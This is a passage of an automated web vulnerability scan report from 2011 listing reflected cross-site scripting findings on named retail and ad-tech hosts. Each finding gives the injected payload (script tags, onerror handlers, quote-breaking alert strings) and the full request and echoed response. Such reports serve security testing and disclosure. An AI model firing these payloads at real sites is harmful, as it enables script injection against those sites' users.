Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/pop_email_011011b

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d2c41<img%20src%3da%20onerror%3dalert(1)>5c8d452e9c8 was submitted in the REST URL parameter 4. This input was echoed as d2c41<img src=a onerror=alert(1)>5c8d452e9c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/pop_email_011011bd2c41<img%20src%3da%20onerror%3dalert(1)>5c8d452e9c8?$img_jpg$&$ext=.jpg HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:46 GMT
Connection: close

Unable to find /pacsun/pop_email_011011bd2c41<img src=a onerror=alert(1)>5c8d452e9c8

5.34. http://images3.pacsun.com/is/image/pacsun/redesign_social [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/redesign_social

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 25ab1<img%20src%3da%20onerror%3dalert(1)>aeaa39cfdec was submitted in the REST URL parameter 4. This input was echoed as 25ab1<img src=a onerror=alert(1)>aeaa39cfdec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/redesign_social25ab1<img%20src%3da%20onerror%3dalert(1)>aeaa39cfdec?$img_gif-alpha$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:01 GMT
Connection: close

Unable to find /pacsun/redesign_social25ab1<img src=a onerror=alert(1)>aeaa39cfdec

5.35. http://images3.pacsun.com/is/image/pacsun/spacer [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/spacer

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ee327<img%20src%3da%20onerror%3dalert(1)>a0cf7621480 was submitted in the REST URL parameter 4. This input was echoed as ee327<img src=a onerror=alert(1)>a0cf7621480 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/spaceree327<img%20src%3da%20onerror%3dalert(1)>a0cf7621480?$img_gif$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 73
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:12 GMT
Connection: close

Unable to find /pacsun/spaceree327<img src=a onerror=alert(1)>a0cf7621480

5.36. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox12.offermatica.com
Path:   /m2/guitarcenter/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 15167<script>alert(1)</script>f4f6edc5c01 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/guitarcenter/mbox/standard?mboxHost=www.guitarcenter.com&mboxSession=1305510019406-714170&mboxPC=1305510019406-714170.17&mboxPage=1305510818677-601208&mboxCount=1&mbox=GC_hp_events15167<script>alert(1)</script>f4f6edc5c01&mboxId=0&mboxURL=http%3A%2F%2Fwww.guitarcenter.com%2F%3FCJAID%3D10453836%26CJPID%3D2537521&mboxReferrer=&mboxVersion=34 HTTP/1.1
Host: mbox12.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 208
Date: Mon, 16 May 2011 01:56:41 GMT
Server: Test & Target

mboxFactories.get('default').get('GC_hp_events15167<script>alert(1)</script>f4f6edc5c01',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1305510019406-714170.17");

5.37. http://pixel.fetchback.com/serve/fb/pdc [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 26383<x%20style%3dx%3aexpression(alert(1))>17d9ad9eed6 was submitted in the name parameter. This input was echoed as 26383<x style=x:expression(alert(1))>17d9ad9eed6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landing26383<x%20style%3dx%3aexpression(alert(1))>17d9ad9eed6&sid=3167 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1305510200_11939:0_5512:44812; uid=1_1305510200_1305465388147:4406953890584386; kwd=1_1305510200; sit=1_1305510200_3166:0:0_3167:28:28_1888:44812:44812; cre=1_1305510200; bpd=1_1305510200; apd=1_1305510200; scg=1_1305510200; ppd=1_1305510200; afl=1_1305510200

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:51 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1305511011_11939:811_5512:45623; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: uid=1_1305511011_1305465388147:4406953890584386; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: kwd=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: sit=1_1305511011_3166:811:811_3167:839:839_1888:45623:45623; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: cre=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: bpd=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: apd=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: scg=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: ppd=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: afl=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 16 May 2011 01:56:51 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landing26383<x style=x:expression(alert(1))>17d9ad9eed6' *not* found -->

5.38. http://px.steelhousemedia.com/pr [get_px parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://px.steelhousemedia.com
Path:   /pr

Issue detail

The value of the get_px request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb714'-alert(1)-'9f1b1c0493f was submitted in the get_px parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pr?get_px=1cb714'-alert(1)-'9f1b1c0493f&prov_id=9056 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: checkCookie=success;Domain=.steelhousemedia.com
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Connection: close

(function() {
steelhouse = {
   cadd: function(obj, etype, fn, cap) {
       cap = cap || false;
       if (obj.addEventListener) obj.addEventListener(etype, fn, cap);
       else if (obj.attachEvent) obj.attachEvent("on" + etype, fn);
   },
   cload: function() {
       var st = document.createElement('script');
       var sturl = 'px.steelhousemedia.com/st?get_px=1cb714'-alert(1)-'9f1b1c0493f&aid=9056&cb=1305542500340658&ce=1';
       st.type = 'text/javascript';
       st.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + sturl;
       var list=document.getElementsByTagName('sc
...[SNIP]...

5.39. http://px.steelhousemedia.com/pr [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://px.steelhousemedia.com
Path:   /pr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eb2d'-alert(1)-'136f0dfcab4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pr?get_px=1&prov_id=9056&9eb2d'-alert(1)-'136f0dfcab4=1 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: checkCookie=success;Domain=.steelhousemedia.com
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Connection: close

(function() {
steelhouse = {
   cadd: function(obj, etype, fn, cap) {
       cap = cap || false;
       if (obj.addEventListener) obj.addEventListener(etype, fn, cap);
       else if (obj.attachEvent) obj.attachEvent("on" + etype, fn);
   },
   cload: function() {
       var st = document.createElement('script');
       var sturl = 'px.steelhousemedia.com/st?get_px=1&aid=9056&9eb2d'-alert(1)-'136f0dfcab4=1&cb=1305542505819756&ce=1';
       st.type = 'text/javascript';
       st.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + sturl;
       var list=document.getElementsByTagName('script');
...[SNIP]...

5.40. http://px.steelhousemedia.com/pr [prov_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://px.steelhousemedia.com
Path:   /pr

Issue detail

The value of the prov_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8130e'-alert(1)-'66a20514f58 was submitted in the prov_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pr?get_px=1&prov_id=90568130e'-alert(1)-'66a20514f58 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: checkCookie=success;Domain=.steelhousemedia.com
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Connection: close

(function() {
steelhouse = {
   cadd: function(obj, etype, fn, cap) {
       cap = cap || false;
       if (obj.addEventListener) obj.addEventListener(etype, fn, cap);
       else if (obj.attachEvent) obj.attachEvent("on" + etype, fn);
   },
   cload: function() {
       var st = document.createElement('script');
       var sturl = 'px.steelhousemedia.com/st?get_px=1&aid=90568130e'-alert(1)-'66a20514f58&cb=1305542503023599&ce=1';
       st.type = 'text/javascript';
       st.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + sturl;
       var list=document.getElementsByTagName('script');

...[SNIP]...

5.41. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload f1893%0aalert(1)//ec5edae4c66 was submitted in the site parameter. This input was echoed as f1893
alert(1)//ec5edae4c66
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=1402662f1893%0aalert(1)//ec5edae4c66&d_id=bluefly-english HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510908159

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 16 May 2011 02:03:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 458
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSDRRBRB=JICDIKHANBIPGCCIIAEHECCG; path=/
Cache-control: private

//Plugins for site 1402662f1893
alert(1)//ec5edae4c66

<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=2
...[SNIP]...

5.42. https://secure.bhphotovideo.com/bnh/controller/home [O parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The value of the O request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 49fb3'><script>alert(1)</script>d3fa006fb10 was submitted in the O parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bnh/controller/home?O=cart.jsp49fb3'><script>alert(1)</script>d3fa006fb10&A=getpage&Q=Login.jsp HTTP/1.1
Host: secure.bhphotovideo.com
Connection: keep-alive
Referer: http://www.bhphotovideo.com/find/cart.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; JSESSIONID=pfTcNQ5SFQ!-112699937

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 10:18:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:18:26 GMT
Connection: keep-alive
Set-Cookie: TS20403f=6d633c8d60c83f78b51cf537b6a9e4775ba07e5bbdb6173b4dd0f9f2; Path=/
Content-Length: 30790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="/FrameWork/js/t
...[SNIP]...
<input type="hidden" name="prev_O" value='cart.jsp49fb3'><script>alert(1)</script>d3fa006fb10'/>
...[SNIP]...

5.43. https://secure.bhphotovideo.com/bnh/controller/home [f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The value of the f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd request parameter is copied into the HTML document as plain text between tags. The payload 91394<script>alert(1)</script>a321fbd6cb1 was submitted in the f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=191394<script>alert(1)</script>a321fbd6cb1 HTTP/1.1
Host: secure.bhphotovideo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1
Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 11:09:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 11:09:30 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=3T6hNRFdMX!-983539603; domain=bhphotovideo.com; path=/
Set-Cookie: cookieID=18171488471305544157963; domain=bhphotovideo.com; expires=Saturday, 03-Jun-2079 14:23:25 GMT; path=/
Set-Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530; Path=/
Content-Length: 30967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="/FrameWork/js/t
...[SNIP]...
</script>bb73022ddbd" value='191394<script>alert(1)</script>a321fbd6cb1'/>
...[SNIP]...

5.44. https://secure.bhphotovideo.com/bnh/controller/home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6d64"><script>alert(1)</script>bb73022ddbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64"><script>alert(1)</script>bb73022ddbd=1 HTTP/1.1
Host: secure.bhphotovideo.com
Connection: keep-alive
Referer: http://www.bhphotovideo.com/find/cart.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; JSESSIONID=pfTcNQ5SFQ!-112699937

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 10:20:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:20:49 GMT
Connection: keep-alive
Set-Cookie: TS20403f=269e69a03030dd52b6fccf207c5322ed1be61ea6e18d367e4dd0fa81; Path=/
Content-Length: 30846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="/FrameWork/js/t
...[SNIP]...
<input type="hidden" name="prev_f6d64"><script>alert(1)</script>bb73022ddbd" value='1'/>
...[SNIP]...

5.45. http://sr2.liveperson.net/visitor/addons/deploy.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sr2.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 97932%0aalert(1)//3be4a2facd2 was submitted in the site parameter. This input was echoed as 97932
alert(1)//3be4a2facd2
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=5396538397932%0aalert(1)//3be4a2facd2&d_id=toshiba HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 459
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: private, max-age=86400
Date: Mon, 16 May 2011 10:34:57 GMT
Connection: close

//Plugins for site 5396538397932
alert(1)//3be4a2facd2

<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=
...[SNIP]...

5.46. http://sv.liveclicker.net/service/api [var parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sv.liveclicker.net
Path:   /service/api

Issue detail

The value of the var request parameter is copied into the HTML document as plain text between tags. The payload c9387<script>alert(1)</script>63737674e7e was submitted in the var parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service/api?method=liveclicker.widget.getList&account_id=311&&dim10=1&status=online&format=json&var=liveclicker.api_res[0]c9387<script>alert(1)</script>63737674e7e HTTP/1.1
Host: sv.liveclicker.net
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:04 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Type: application/json;charset=utf-8
Connection: close
Content-Length: 1753

liveclicker.api_res[0]c9387<script>alert(1)</script>63737674e7e = { "widgets" : { "widget" : [ { "widget_id" : "15895", "asset_id" : "27151", "versionNumber" : "1", "title" : "How To Train Your Dog to Sit", "length" : "1:07", "rating" : "0", "views" : "911455", "t
...[SNIP]...

